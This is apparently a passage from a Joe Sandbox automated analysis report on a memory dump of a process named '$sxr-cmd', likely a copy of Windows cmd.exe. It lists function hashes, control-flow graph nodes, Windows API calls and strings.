• Opcode ID: aa9ea99ae18befcdff354521521d3befe7903b525e5394531d6d563bbc5abe5f
• Instruction ID: 961f06866075b2b1a04b8f057930b6596c35e57130b8e5121036d0759c48a79e
• Opcode Fuzzy Hash: aa9ea99ae18befcdff354521521d3befe7903b525e5394531d6d563bbc5abe5f
• Instruction Fuzzy Hash: 79919161B09E8285EFA4AB10D8901F8A3A4FF48BA4FC44535C91E67794EF3DE51CC320
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
• Instruction ID: d6394d3c4d3499a8b2829560184a96dda8aa5e7f805f25193b00f20e82d44886
• Opcode Fuzzy Hash: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
• Instruction Fuzzy Hash: 9A41FC35A19F028BE7856B15E884578FAA0BB8AB71FD48134C91E63360DF7EA41CC630
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 991 7ff7137ec620-7ff7137ec66f GetConsoleTitleW 992 7ff7137ec675-7ff7137ec687 call 7ff7137eaf14 991->992 993 7ff7137fc5f2 991->993 998 7ff7137ec68e-7ff7137ec69d call 7ff7137eca40 992->998 999 7ff7137ec689 992->999 995 7ff7137fc5fc-7ff7137fc60c GetLastError 993->995 997 7ff7137fc5e3 call 7ff7137e3278 995->997 1003 7ff7137fc5e8-7ff7137fc5ed call 7ff7137f855c 997->1003 998->1003 1004 7ff7137ec6a3-7ff7137ec6ac 998->1004 999->998 1003->993 1006 7ff7137ec954-7ff7137ec95e call 7ff7137f291c 1004->1006 1007 7ff7137ec6b2-7ff7137ec6c5 call 7ff7137eb9c0 1004->1007 1014 7ff7137ec964-7ff7137ec96b call 7ff7137e89c0 1006->1014 1015 7ff7137fc5de-7ff7137fc5e0 1006->1015 1012 7ff7137ec9b5-7ff7137ec9b8 call 7ff7137f5c6c 1007->1012 1013 7ff7137ec6cb-7ff7137ec6ce 1007->1013 1021 7ff7137ec9bd-7ff7137ec9c9 call 7ff7137f855c 1012->1021 1013->1003 1016 7ff7137ec6d4-7ff7137ec6e9 1013->1016 1022 7ff7137ec970-7ff7137ec972 1014->1022 1015->997 1019 7ff7137fc616-7ff7137fc620 call 7ff7137f855c 1016->1019 1020 7ff7137ec6ef-7ff7137ec6fa 1016->1020 1025 7ff7137fc627 1019->1025 1024 7ff7137ec700-7ff7137ec713 1020->1024 1020->1025 1038 7ff7137ec9d0-7ff7137ec9d7 1021->1038 1022->995 1023 7ff7137ec978-7ff7137ec99a towupper 1022->1023 1028 7ff7137ec9a0-7ff7137ec9a9 1023->1028 1029 7ff7137fc631 1024->1029 1030 7ff7137ec719-7ff7137ec72c 1024->1030 1025->1029 1028->1028 1033 7ff7137ec9ab-7ff7137ec9af 1028->1033 1035 7ff7137fc63b 1029->1035 1034 7ff7137ec732-7ff7137ec747 call 7ff7137ed3f0 1030->1034 1030->1035 1033->1012 1036 7ff7137fc60e-7ff7137fc611 call 7ff71380ec14 1033->1036 1044 7ff7137ec74d-7ff7137ec750 1034->1044 1045 7ff7137ec8ac-7ff7137ec8af 1034->1045 1043 7ff7137fc645 1035->1043 1036->1019 1041 7ff7137ec872-7ff7137ec8aa call 7ff7137f855c call 7ff7137f8f80 1038->1041 1042 7ff7137ec9dd-7ff7137fc6da SetConsoleTitleW 1038->1042 1042->1041 1052 7ff7137fc64e-7ff7137fc651 1043->1052 1048 7ff7137ec752-7ff7137ec764 call 7ff7137ebd38 1044->1048 1049 7ff7137ec76a-7ff7137ec76d 1044->1049 1045->1044 1051 7ff7137ec8b5-7ff7137ec8d3 wcsncmp 1045->1051 1048->1003 1048->1049 1057 7ff7137ec773-7ff7137ec77a 1049->1057 1058 7ff7137ec840-7ff7137ec84b call 7ff7137ecb40 1049->1058 1051->1049 1059 7ff7137ec8d9 1051->1059 1053 7ff7137ec80d-7ff7137ec811 1052->1053 1054 7ff7137fc657-7ff7137fc65b 1052->1054 1061 7ff7137ec9e2-7ff7137ec9e7 1053->1061 1062 7ff7137ec817-7ff7137ec81b 1053->1062 1054->1053 1065 7ff7137ec780-7ff7137ec784 1057->1065 1074 7ff7137ec856-7ff7137ec86c 1058->1074 1075 7ff7137ec84d-7ff7137ec855 call 7ff7137ecad4 1058->1075 1059->1044 1061->1062 1069 7ff7137ec9ed-7ff7137ec9f7 call 7ff7137f291c 1061->1069 1067 7ff7137ec821 1062->1067 1068 7ff7137eca1b-7ff7137eca1f 1062->1068 1070 7ff7137ec83d 1065->1070 1071 7ff7137ec78a-7ff7137ec7a4 wcschr 1065->1071 1077 7ff7137ec824-7ff7137ec82d 1067->1077 1068->1067 1076 7ff7137eca25-7ff7137fc6b3 call 7ff7137e3278 1068->1076 1090 7ff7137fc684-7ff7137fc698 call 7ff7137e3278 1069->1090 1091 7ff7137ec9fd-7ff7137eca00 1069->1091 1070->1058 1072 7ff7137ec8de-7ff7137ec8f7 1071->1072 1073 7ff7137ec7aa-7ff7137ec7ad 1071->1073 1079 7ff7137ec900-7ff7137ec908 1072->1079 1080 7ff7137ec7b0-7ff7137ec7b8 1073->1080 1074->1038 1074->1041 1075->1074 1076->1003 1077->1077 1083 7ff7137ec82f-7ff7137ec837 1077->1083 1079->1079 1085 7ff7137ec90a-7ff7137ec915 1079->1085 1080->1080 1086 7ff7137ec7ba-7ff7137ec7c7 1080->1086 1083->1065 1083->1070 1093 7ff7137ec93a-7ff7137ec944 1085->1093 1094 7ff7137ec917 1085->1094 1086->1052 1095 7ff7137ec7cd-7ff7137ec7db 1086->1095 1090->1003 1091->1062 1092 7ff7137eca06-7ff7137eca10 call 7ff7137e89c0 1091->1092 1092->1062 1110 7ff7137eca16-7ff7137fc67f GetLastError call 7ff7137e3278 1092->1110 1102 7ff7137eca2a-7ff7137eca2f call 7ff7137f9158 1093->1102 1103 7ff7137ec94a 1093->1103 1099 7ff7137ec920-7ff7137ec928 1094->1099 1100 7ff7137ec7e0-7ff7137ec7e7 1095->1100 1105 7ff7137ec932-7ff7137ec938 1099->1105 1106 7ff7137ec92a-7ff7137ec92f 1099->1106 1107 7ff7137ec800-7ff7137ec803 1100->1107 1108 7ff7137ec7e9-7ff7137ec7f1 1100->1108 1102->1015 1103->1006 1105->1093 1105->1099 1106->1105 1107->1043 1112 7ff7137ec809 1107->1112 1108->1107 1111 7ff7137ec7f3-7ff7137ec7fe 1108->1111 1110->1003 1111->1100 1111->1107 1112->1053
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:$C:\Windows
• API String ID: 2364928044-2365244837
• Opcode ID: 3ce203a2d681a677f138c339ca1d64b501cdeb8a980a49a03dd7b8658ec4f088
• Instruction ID: 3e0cd4211b5a116c3444cef5c9c4730b2630e87cc812026accceb59f3a26f642
• Opcode Fuzzy Hash: 3ce203a2d681a677f138c339ca1d64b501cdeb8a980a49a03dd7b8658ec4f088
• Instruction Fuzzy Hash: 47C18C65A08A4381FFA4BB1594842B9E2A5BF48BA0FC44231D96E772D5DF3CE84CD320
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 1170 7ff7137f8d80-7ff7137f8da2 1171 7ff7137f8da4-7ff7137f8daf 1170->1171 1172 7ff7137f8db1-7ff7137f8db4 1171->1172 1173 7ff7137f8dcc 1171->1173 1174 7ff7137f8db6-7ff7137f8dbd 1172->1174 1175 7ff7137f8dbf-7ff7137f8dca Sleep 1172->1175 1176 7ff7137f8dd1-7ff7137f8dd9 1173->1176 1174->1176 1175->1171 1177 7ff7137f8ddb-7ff7137f8de5 _amsg_exit 1176->1177 1178 7ff7137f8de7-7ff7137f8def 1176->1178 1179 7ff7137f8e4c-7ff7137f8e54 1177->1179 1180 7ff7137f8e46 1178->1180 1181 7ff7137f8df1-7ff7137f8e0a 1178->1181 1182 7ff7137f8e56-7ff7137f8e69 _initterm 1179->1182 1183 7ff7137f8e73-7ff7137f8e75 1179->1183 1180->1179 1184 7ff7137f8e0e-7ff7137f8e11 1181->1184 1182->1183 1185 7ff7137f8e80-7ff7137f8e88 1183->1185 1186 7ff7137f8e77-7ff7137f8e79 1183->1186 1187 7ff7137f8e13-7ff7137f8e15 1184->1187 1188 7ff7137f8e38-7ff7137f8e3a 1184->1188 1190 7ff7137f8eb4-7ff7137f8ec8 call 7ff7137f37d8 1185->1190 1191 7ff7137f8e8a-7ff7137f8e98 call 7ff7137f94f0 1185->1191 1186->1185 1189 7ff7137f8e3c-7ff7137f8e41 1187->1189 1192 7ff7137f8e17-7ff7137f8e1b 1187->1192 1188->1179 1188->1189 1193 7ff7137f8f28-7ff7137f8f3d 1189->1193 1199 7ff7137f8ecd-7ff7137f8eda 1190->1199 1191->1190 1202 7ff7137f8e9a-7ff7137f8eaa 1191->1202 1195 7ff7137f8e2d-7ff7137f8e36 1192->1195 1196 7ff7137f8e1d-7ff7137f8e29 1192->1196 1195->1184 1196->1195 1200 7ff7137f8ee4-7ff7137f8eeb 1199->1200 1201 7ff7137f8edc-7ff7137f8ede exit 1199->1201 1204 7ff7137f8eed-7ff7137f8ef3 _cexit 1200->1204 1205 7ff7137f8ef9 1200->1205 1201->1200 1202->1190 1204->1205 1205->1193
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction ID: 72056998dfaa14b9796beeaca08af1dd2930cd545ecfb3a6fd037ef02c3ff025
• Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction Fuzzy Hash: 4341DB21A18E2399FBD0BF10E980335E6A4BF58764F840435D92D676A0DFBDE85C8771
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 1206 7ff7137e89c0-7ff7137e8a3d memset call 7ff7137eca40 1209 7ff7137e8a43-7ff7137e8a71 GetDriveTypeW 1206->1209 1210 7ff7137e8ace-7ff7137e8adf 1206->1210 1213 7ff7137fb411-7ff7137fb422 1209->1213 1214 7ff7137e8a77-7ff7137e8a7a 1209->1214 1211 7ff7137e8ae1-7ff7137e8ae8 ??_V@YAXPEAX@Z 1210->1211 1212 7ff7137e8aed 1210->1212 1211->1212 1216 7ff7137e8aef-7ff7137e8b16 call 7ff7137f8f80 1212->1216 1217 7ff7137fb424-7ff7137fb42b ??_V@YAXPEAX@Z 1213->1217 1218 7ff7137fb430-7ff7137fb435 1213->1218 1214->1210 1215 7ff7137e8a7c-7ff7137e8a7f 1214->1215 1215->1210 1219 7ff7137e8a81-7ff7137e8ac8 GetVolumeInformationW 1215->1219 1217->1218 1218->1216 1219->1210 1221 7ff7137fb3fc-7ff7137fb40b GetLastError 1219->1221 1221->1210 1221->1213
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 850181435-0
                                                                                                            • Opcode ID: 323850a57e99924bc9cf781ab4045ebe0c1eeb0e1a1d4ccf402750c0a9cf2a6e
                                                                                                            • Instruction ID: 779eba56883449fe6555408b480aac34ca8a4e3fa000a7d723cb2ea783209036
                                                                                                            • Opcode Fuzzy Hash: 323850a57e99924bc9cf781ab4045ebe0c1eeb0e1a1d4ccf402750c0a9cf2a6e
                                                                                                            • Instruction Fuzzy Hash: CD416D32618FC1C9EBA19F20D8842E9BBA4FB89B54F844135DA4D6BB48CF38D54DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; basic blocks 7ff7137f4a14-7ff7137f4ac5 call GetEnvironmentStringsW, GetProcessHeap, RtlAllocateHeap, memmove and RtlFreeHeap)

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocateEnvironmentFreeProcessStringsmemmove
• String ID:
• API String ID: 2247642577-0
• Opcode ID: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
• Instruction ID: c789080e4d9b87e5bef752130d5ae65a980cded8ed73cf7c9bf347d32eb58f36
• Opcode Fuzzy Hash: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
• Instruction Fuzzy Hash: 96119122A18F4286DA90AB15A444139FBA4FB8DFA0B899134DE4E23754DF3DE4498760
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
• Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction ID: 499d90502f660c4e71f489f367fbda59370e1dc696d8ad53d8d8bcad1fadc9ef
• Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction Fuzzy Hash: 71310321A08E1286E7A0BF15A48047EF665FB4DBA0FD48135DA6E633D0DF7DE84D8320
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AD6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AEF
  • Part of subcall function 00007FF7137F4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A28
  • Part of subcall function 00007FF7137F4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A66
  • Part of subcall function 00007FF7137F4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A7D
  • Part of subcall function 00007FF7137F4A14: memmove.MSVCRT(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A9A
  • Part of subcall function 00007FF7137F4A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4AA2
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137FEE64
• RtlFreeHeap.NTDLL(?,?,?,00007FF7137E8798), ref: 00007FF7137FEE78
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$Free$AllocAllocateEnvironmentStringsmemmove
• String ID:
• API String ID: 3193623387-0
• Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
• Instruction ID: ea4029689b8f05a3e2498f5e0000999969b67e8c1bbf797644cb7af78f3475c5
• Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
• Instruction Fuzzy Hash: 94F06221A15F42CBFF85A765A444178E9D2FF8EB61B88D834CD0E62340EE3CA45C8B30
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset
• String ID: onecore\base\cmd\maxpathawarestring.cpp
• API String ID: 2221118986-3416068913
• Opcode ID: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
• Instruction ID: c513c31dd0d28facb67b109d1be6130b5ae37001a331224adc18fa99c82417d7
• Opcode Fuzzy Hash: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
• Instruction Fuzzy Hash: 5111A321A08E4385EFD0EB55A1842B99290AF88BB4F984331DD7D6B3D5DE3DD04C8320
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memsetwcschr
• String ID: 2$COMSPEC
• API String ID: 1764819092-1738800741
• Opcode ID: 2d0ef5fe1d299edb116169e4c9a5eff0224fc8a498bf86c607940334a72b9e92
• Instruction ID: 1d8c5f4c355a7634149a6038e87c411d2acf64ca8a86a7a678e46655ba208ee0
• Opcode Fuzzy Hash: 2d0ef5fe1d299edb116169e4c9a5eff0224fc8a498bf86c607940334a72b9e92
• Instruction Fuzzy Hash: 26519F21A0CE4385FBE8BB259491379EA94AF4C7A4FC44231DA4DB62D5DE3CE84C8771
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$ErrorFileFindFirstLastwcsrchr
• String ID:
• API String ID: 4254246844-0
• Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction ID: b2570f46169b6ac96902e3e88a3703463ba27a88868b933bd7d79ee94e5c1964
• Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction Fuzzy Hash: 31419221A08F4286FFA0AB04E484379E7A4FF89BA0F844535D96E577C0DF3CE44D8620
Uniqueness

Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                            • String ID:
                                                                                                            • API String ID: 2643372051-0
                                                                                                            • Opcode ID: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                            • Instruction ID: 43c3682b023ef2b1651b88c005cc0dea68b6a810e4356ae7f9783a4f30195c77
                                                                                                            • Opcode Fuzzy Hash: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                            • Instruction Fuzzy Hash: B0F08662A19F4286EB80AB66F444075EAE1FF9D7B0BD59234C57E23390DE7C949C8630
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _get_osfhandle$ConsoleMode
• String ID:
• API String ID: 1591002910-0
